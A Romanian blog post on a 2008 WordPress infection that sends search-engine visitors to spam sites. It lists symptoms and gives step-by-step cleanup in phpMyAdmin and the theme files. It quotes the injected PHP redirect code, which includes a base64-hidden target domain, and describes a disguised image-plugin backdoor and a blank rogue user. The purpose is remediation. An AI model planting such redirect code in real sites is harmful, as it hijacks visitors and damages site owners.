02
Jul
08

Exploit de Wordpress dătător de backlinkuri, redirecturi şi bătăi de cap fără vizitatori :)

Umblă vorba prin târg cum că ar fi un exploit pentru Wordpress, exploit care ar merge inclusiv la ultima versiune 2.5.1. care plantează şi rulează coduri maliţioase in funcţiile Wordpress şi în baza de date pentru care
redirectează vizitatorii şi hiturile din Google sau alte motoare de căutare către site-uri de spam. Alte hackuri
redirectează toţi vizitatorii exceptând pe cei ce au cookie pentru site-ul respectiv.

Simptome: A se nota că aceste simptome nu se întâmplă toate deodată, ele putând rula de sine stătător.

- Hituri din motoare de căutare precum Google, Zahoo, AOL, MSN, Live către site-ul dumneavoastră vor fi redirectate către site-uri hackerilor gen your-needs.info, golden-info.net, keymachine.de, seogoogle.us ( lista este mică şi sigur creşte rapid ). Vizitatorii ajung la pagina hackerului prin cuvintele cheie folosite în căutari şi într-un mod similar redirectului 301.
- Dând un click către blog din RSS Feed Reader cum este Google Reader pot fi redirectate către site-ul hackerului deasemenea.
- Un vizitator fără cont pe blog sau nelogat ( nu este detectat cookie de codul maliţios ) va fi deasemenea
redirectat către site-uri de spam.
- Doar vizitele din motoarele de căutare sunt redirectate, iar prin acest truc se descoperă mai greu problema.
- Scăderi masive în numărul vizitatorilor, în special în site-urile în care Google trimite peste 70% din
vizitatori, chiar dacă pe moment rankingul în Google rămâne neschimbat.
- Scăderi masive de venit generat prin Google AdSense sau alt fel de reclame PPC.
- Următorul cod codat base64 poate apărea în wp-blog-header.php:

<?php \
$seref=array(”google”,”msn”,”live”,”altavista”,”ask”,”yahoo”,”aol”,”cnn”,”weather”,”alexa”);
$ser=0; foreach($seref as $ref) if(strpos(strtolower($_SERVER[’HTTP_REFERER’]),$ref)!==false){ $ser=”1?; break; }
if($ser==”1? && sizeof($_COOKIE)==0){ header(”Location: http://”.base64_decode(”YW55cmVzdWx0cy5uZXQ=”).”/”); exit;
}?>

- O poză care de fapt conţine cod maliţios apare prin directorul wp-contents/uploads. De exemplu
wp-contents/uploads/2008/06/06/qwerty.jpg sau chiar în folderul temei wp-contents/themes/classic/images/qwerty.jpg. Numele pozei se pare că este de tipul xxxxx_old.jpeg.
- S-a introdus în baza de date un cod ( în wp_options ) pentru a activa o imagine ( cod PHP maliţios de fapt ).
Codul rss_f541b3abd05e7962fcab37737f40fad8 apare de cele mai multe ori, dar rss_xxxxxxxxxxxx este formatul pe care îl adoptă.
- Orice tema de Wordpress activată şi folosită poate fi şi ea infectată prin injectarea unui cod de redirect în
header.php sau index.php.

Iată un fix pentru aceste probleme pentru a vă primi înapoi vizitatorii şi traficul şi pentru a evita penalizarea
Google pentru redirectări către site-uri de spam.

1. Faceţi un backup la baza de date.
2. Folosiţi phpMyadmin pentru a lucra puţin în baza de date. Mergeţi la tabelul wp_options şi editaţi linia
denumită active_plugins. Acest rând ne arată toate pluginurile active. Vedeţi dacă aveţi activ vreun plugin cu nume terminându-se în extensie de poză ( gif, jpg, png, jpeg ). Notaţi calea către fişier.
3. Folosind sFTP sau SSH ( pentru securitate nu folosiţi FTP sau Telnet ) şi ştergeţi fişierul.
4. Mergeţi în administrarea Wordpress, panoul Plugins, activaţi sau dezactivaţi orice plugin doriţi pentru a şterge codul maliţios din rândul active_plugins.
5. Înapoi la phpMyAdmin, în tabelul wp_options, găsiţi rândul care conţine următoarea linie ca option_name:
rss_f541b3abd05e7962fcab37737f40fad8
Ştergeţi rândul.

6. Mergeţi la tabela wp_users. Dacă vedeţi un user fără nume ( valoare nulă în câmpul user_nicename ) creat la 00:00:00 0000-00-00, notaţi ID-ul acestui user ( câmpul ID ) după care ştergeţi-l.
7. In tabela wp_usermeta localizaţi rândurile în care user_id se potriveşte cu ID-ul userului tocmai şters. Ştergeţi aceste rânduri.
8. Căutaţi în folderul temei folosite de dumneavoastră în fişierele header.php şi index.php pentru orice cod suspicios. Acesta arată astfel:

if($ser==”1″ && sizeof($_COOKIE)==0){ header(”Location:

Dacă găsiţi aşa ceva, ştergeţi codul. A se nota că acest cod poate fi pe mai multe linii şi poate însemna si câteva rânduri întregi de litere care de fapt este acelaşi lucru codat base64.

9. Dacă cumva nu există, creaţi un fişier gol index.html in directorul wp-contents/plugins.
10. Uploadaţi şi scrieţi peste fişierele deja existente, fişierele originale de Wordpress. Dacă upgradaţi, citiţi ghidul cu atenţie.
11. Schimbaţi-vă parola,
12. Dacă aveţi mai mulţi utilizatori, schimbaţi-le parola sau cereţi-le acest lucru.

Revin şi cu alte detalii.




Luati-o si pe mail!

Un serviciu oferit de FeedBurner





Sustinem


Love Island Sex Shop

September 2010
M T W T F S S
« Aug    
 12345
6789101112
13141516171819
20212223242526
27282930  











  • Login
  • Inregistreaza-te

Aboneaza-te la Imprevizibil(i) - Acum cu caciulita - Postaaaaaaaaaaaaaaaa!

Ce mai cauta lumea?

*English posts 1 iunie 1martie 8 martie 8 martie poezii activitate ad ads advertising Alanis Morissette amanta amintiri amuzant ana andra un lucru sa mi dai animale antrenor steaua anunt apa armani armata aspirina audio Australia averi babele bac bacalaureat baie banc banca bancuri bancuri cu bula barbati basme Basshunter bataie bautura alcoolica beat becali beer berbec bere betivi big girls dont cry lyrics bill gates bing bang Biondo Biondo Shine blaxy girls bleeding love lyrics Blegotevela blog blonde bon fiscal borcea Britney Spears bucuresti bula bush buzau caine caini cal calcat calculator cantece de 8 martie capricorn cat catalin josan Catalin Josan Run away Cel mai misto tip din Romania chat Cheia de sub pres versuri chilian cillit bang Come this way comic commercial concluzia concluzia zilei concluzie concluzii condus connex copii copil criti balaj cutit dana de ce derby Dima Bilan Eurovision dinamo divort dog doru octavian dumitru download dragoste Dragostea mea droguri dureri de cap e Romania mea? economie ehhhhhhh elevi eminescu engleza erick e eurovision eurovision 2008 eurovision 2008 romania eurovision romania Evanescence examen examene Fairytale story fata faze comice felicitari 8 martie felicitari de 8 martie femei fighter jet film florin chilian fly project versuri Follow me football fotbal free mp3 download french toast friends frigider fun Fun blog fun cats funny funny cat funny moments funny video furt gabor gag gagiu gags game gheata gigi becali girafa girlfriend gloria buzau golf google gripa aviara hack HAHAHA hai cuaie ma lasi? haioase haios hi5 hollow holograf hot hoti idei idioti ihaaaaaa ihaaaaaaa im yours lyrics incredibil internet Iris jigniri? jocuri juanes la multi ani La multi ani Andreea la padure :) labagii Laif laugh lautari league leo iorga si pacifica letter leu liber Libertatea liniste live lol love Love Is All I Need Love you Live lyrics management manager manele mare maria Marius Moga martisor martisorul masina masini meci medici messenger metallica Michael Jackson microsoft minciuni mirc misto mita morandi movie Movies mp3 munca music muzica muzica buna myspace nebuni nelly furtado nevasta nico Nicola Fairytale story nimic nivelul erectiei nothing else matters nou nascut noul cod rutier obiceiurile primaverii papagal parazitii parazitii 17 soundtrack parazitii versuri parcare pat Paula Seling Paula Seling si Provincialii Paula Seling si Provincialii Seven Days pfffff pfffffff pffffffff pfffffffff Photoshop pic picture pililici pisica pisici pizza Playlist plictis si inspiratie poezie poezii 8 martie poezii de 8 martie politia politia romana politia rutiera politicieni politie politist politisti Pope Benedict XVI poza poze president prieten prieteni probleme mentale prof prosti protest Provincialii pruteanu putin puya keo viata noua versuri rabdare rapid razboi reclama reclame referee reguli Remember restanta restecp retea rihanna rise up lyrics romana romania ruleta Runa away salariu salariu.Stefan Karastoianov scrisoare scurt metraj scuze semifinala semifinala eurovision semne de circulatie serbare 8 martie serbare de 8 martie Seven days sex sfaturi Shine simona nae skateboard skywalk smiley Smiley versuri sms de dragoste cu politisti soacra soccer somn spaga spray status status yahoo messenger statusuri statusuri pentru yahoo statusuri yahoo statusuri ym stay steaua steaua bucuresti strazi student studii subliminal sumatripan summit superb supravietuire taiwan tampiti taur te ador te iubesc telefon mobil texte The Biggest Bang the last time Thoughts tigari tinere talente?;) toe tren tuica tupeu tutun tv Uncategorized ups urari de anul nou urban valeleu vama vama veche versuri Versuri / Lyrics veveve VH2 VH2 Follow me viata video vlad mirita volkswagen vorbe de duh vst Warren Buffett wassabi windows wordpress Words Versuri wtf? www xp Yahoo yahoo mess yahoo mess status yahoo messenger yahoo messenger status YM ym status ymess you yves larock yves larock lyrics Zero Zero si Marius Moga Zero si Marius Moga Come this way ziua femeii ziua mamei

0 Responses to “Exploit de Wordpress dătător de backlinkuri, redirecturi şi bătăi de cap fără vizitatori :)”


  1. No Comments

Leave a Reply

Citează textul selectat




EURO CUP 2008- AJAX - BIOGRAPHY - PHOTOSHOP CS TUTORIALS - DOCS
YM VISTA - Stealth Settings - Blogger Guide - Webmasters Cafe